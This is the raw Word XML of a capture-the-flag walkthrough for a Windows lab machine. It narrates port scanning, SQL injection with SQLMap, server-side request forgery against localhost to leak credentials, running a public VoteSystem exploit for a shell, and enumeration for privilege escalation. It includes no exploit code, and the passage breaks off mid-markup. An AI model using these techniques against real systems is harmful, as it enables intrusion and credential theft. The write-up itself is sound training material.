    <w:p w14:paraId="082ED57E" w14:textId="0B6E25F4" w:rsidR="00EA2EBA" w:rsidRDefault="00EA2EBA">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc184491957" w:history="1">
        <w:r w:rsidRPr="007A242F">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Figure 7 - Info for privilege escalation manually found</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc184491957 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00D812ED">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="07C0E89E" w14:textId="3419F7B5" w:rsidR="00EA2EBA" w:rsidRDefault="00EA2EBA">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc184491958" w:history="1">
        <w:r w:rsidRPr="007A242F">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Figure 8 - Privilege escalation and root flag</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc184491958 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00D812ED">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D0EA927" w14:textId="0EA89E76" w:rsidR="00CB3015" w:rsidRPr="00D265A3" w:rsidRDefault="00EA2EBA">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4491963"/>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4491964"/>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77BCD9FF" w14:textId="77777777" w:rsidR="001A5952" w:rsidRDefault="001A5952" w:rsidP="001A5952">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="751732E8" wp14:editId="15CAAF8F">
            <wp:extent cx="6120130" cy="4999990"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1689439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39305" name="Immagine 1689439305"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="4999990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A313D56" w14:textId="0717EF12" w:rsidR="00633AD3" w:rsidRPr="001A5952" w:rsidRDefault="001A5952" w:rsidP="001A5952">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc184491951"/>
      <w:r w:rsidRPr="001A5952">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001A5952">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D812ED">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001A5952">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - nMap scan results (part 1)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="6DBFBA6F" w14:textId="77777777" w:rsidR="001A5952" w:rsidRDefault="001A5952" w:rsidP="001A5952">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01266BFE" wp14:editId="18B634F1">
            <wp:extent cx="6120130" cy="1013460"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="116727726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7261" name="Immagine 1167277261"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="1013460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBD4F47" w14:textId="7AE7559E" w:rsidR="00633AD3" w:rsidRDefault="001A5952" w:rsidP="001A5952">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc184491952"/>
      <w:r w:rsidRPr="001A5952">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001A5952">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D812ED">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001A5952">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - nMap scan results (part 2)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="6CEC5F0A" w14:textId="65D07B9F" w:rsidR="00633AD3" w:rsidRDefault="001A5952" w:rsidP="00633AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Open ports are 80, 135, 139, 443, 445, 3306, 5000, 5040, 5985, 5986, 7680, 47001, 49664, 49665, 49666, 49667, 49668, 49669 and 49670. So, this box has a web application running on ports 80, 443, 5000, 5985, 5986 and 47001, MSRPC (port 135) service enabled, </w:t>
      </w:r>
      <w:r w:rsidR="00EA2EBA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NetBIOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (port 139) service enabled, MySQL (port 3306) service enabled, Panda-pub (7680) service enabled and unknown services on ports 5040, 49664, 49665, 49666, 49667, 49668, 49669 and 49670. Also, this box seems to be a Windows target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38416F98" w14:textId="4162DABB" w:rsidR="00633AD3" w:rsidRDefault="00D265A3" w:rsidP="00D265A3">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc184491965"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Initial foothold</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="03EE709C" w14:textId="4833D889" w:rsidR="00633AD3" w:rsidRDefault="001A5952" w:rsidP="00633AD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Since I had a Windows target, I tried to run the </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>rpcdump.py</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> script and I found an interesting named pipe I can leverage to exploit the box. However, it requires some valid credentials, so I can’t do it now. I tried to use the </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>dcomexex.py</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> script, but I have the same “issue”.</w:t>
      </w:r>
      <w:r w:rsidR="00834445">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Also, I have a database exposed. So, I navigate the web application running on port 80 and tried to exploit an SQL injection vulnerability. This seems possible. I run SQLMap, and I accessed to the data contained. I found a hashed password and I tried to crack it, but it seems to be not possible. At this point, I browsed to the web application running on port 443 and I checked his certificate. There, I found a new subdomain and a possible username:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E38D1F1" w14:textId="77777777" w:rsidR="00834445" w:rsidRDefault="00834445" w:rsidP="00834445">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="493EE72F" wp14:editId="1DED87CB">
            <wp:extent cx="4693920" cy="3659485"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31489708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97083" name="Immagine 314897083"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4710621" cy="3672505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08335A3B" w14:textId="15F5CAE2" w:rsidR="00834445" w:rsidRDefault="00834445" w:rsidP="00834445">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc184491953"/>
      <w:r w:rsidRPr="00834445">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00834445">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D812ED">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00834445">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Subdomain and possible username found</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="03533D3A" w14:textId="3E41995E" w:rsidR="00633AD3" w:rsidRDefault="00834445" w:rsidP="00633AD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">So, I added the subdomain in the </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>/etc/hosts</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> file and I browsed to this URL. I found a site where I can upload a file. This application provide</w:t>
      </w:r>
      <w:r w:rsidR="00F47EF9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="00F47EF9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> analysis feature. I had to insert a file URL</w:t>
      </w:r>
      <w:r w:rsidR="00F47EF9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and it includes this file in the page. Since I have some other web server where I didn’t find anything, or I wasn’t able to access via browser, I tried to use those addresses. When I used </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00F47EF9" w:rsidRPr="00061C24">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://127.0.0.1:5000</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F47EF9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, as URL to the web server running on port 5000, I found some credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3540B979" w14:textId="77777777" w:rsidR="00F47EF9" w:rsidRDefault="00F47EF9" w:rsidP="00F47EF9">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BD3DC86" wp14:editId="494EF1BC">
            <wp:extent cx="4435443" cy="2171700"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="18945649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64961" name="Immagine 18945649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7467" cy="2197172"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6722CFA7" w14:textId="0D54E3FD" w:rsidR="00F47EF9" w:rsidRDefault="00F47EF9" w:rsidP="00F47EF9">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc184491954"/>
      <w:r w:rsidRPr="00F47EF9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00F47EF9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D812ED">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00F47EF9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Credentials found</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="32AC37E7" w14:textId="15B768F0" w:rsidR="00D265A3" w:rsidRDefault="00D265A3" w:rsidP="00D265A3">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc184491966"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>User flag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="7F7A781C" w14:textId="66FBDD1B" w:rsidR="00633AD3" w:rsidRDefault="00F47EF9" w:rsidP="00633AD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I tried to use these credentials and I obtained access to the voting portal running on port 80. At this point, I searched an exploit on the Internet against the </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>VoteSystem</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and I run it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442C7369" w14:textId="77777777" w:rsidR="00F47EF9" w:rsidRDefault="00F47EF9" w:rsidP="00F47EF9">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77785975" wp14:editId="30A5F8ED">
            <wp:extent cx="6120130" cy="2248535"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="91553078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0789" name="Immagine 9155307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248535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0522523F" w14:textId="12E78D70" w:rsidR="00633AD3" w:rsidRDefault="00F47EF9" w:rsidP="00F47EF9">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc184491955"/>
      <w:r w:rsidRPr="00F47EF9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00F47EF9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D812ED">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00F47EF9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Exploit and user flag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="3DCDE349" w14:textId="1EEFCE23" w:rsidR="00633AD3" w:rsidRPr="00633AD3" w:rsidRDefault="00F47EF9" w:rsidP="00633AD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Of course, it was needed to insert credentials, IP target and listening IP and port inside the script code. In this way, I obtained a shell and the user flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2891A773" w14:textId="2E9A9447" w:rsidR="00D265A3" w:rsidRDefault="00D265A3" w:rsidP="00D265A3">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc184491967"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Privilege escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="3F035CBE" w14:textId="5257347A" w:rsidR="00497385" w:rsidRDefault="00F47EF9" w:rsidP="00497385">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>At this point I needed to escalate my privileges. I run WinPeas tool and I found two interesting permission set. I was able to</w:t>
      </w:r>
      <w:r w:rsidR="0030670D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> manually</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> find the same information too</w:t>
      </w:r>
      <w:r w:rsidR="0030670D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, so I inserted in this walkthrough both screenshots:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419B9962" w14:textId="77777777" w:rsidR="0030670D" w:rsidRDefault="0030670D" w:rsidP="0030670D">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E680556" wp14:editId="76900897">
            <wp:extent cx="6120130" cy="579755"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="128697412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4126" name="Immagine 1286974126"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="579755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="451FF97E" w14:textId="244AD643" w:rsidR="0030670D" w:rsidRDefault="0030670D" w:rsidP="0030670D">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc184491956"/>
      <w:r w:rsidRPr="0030670D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0030670D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D812ED">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0030670D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Info for privilege escalation (using WinPeas)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="6E7ACC28" w14:textId="77777777" w:rsidR="0030670D" w:rsidRDefault="0030670D" w:rsidP="0030670D">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
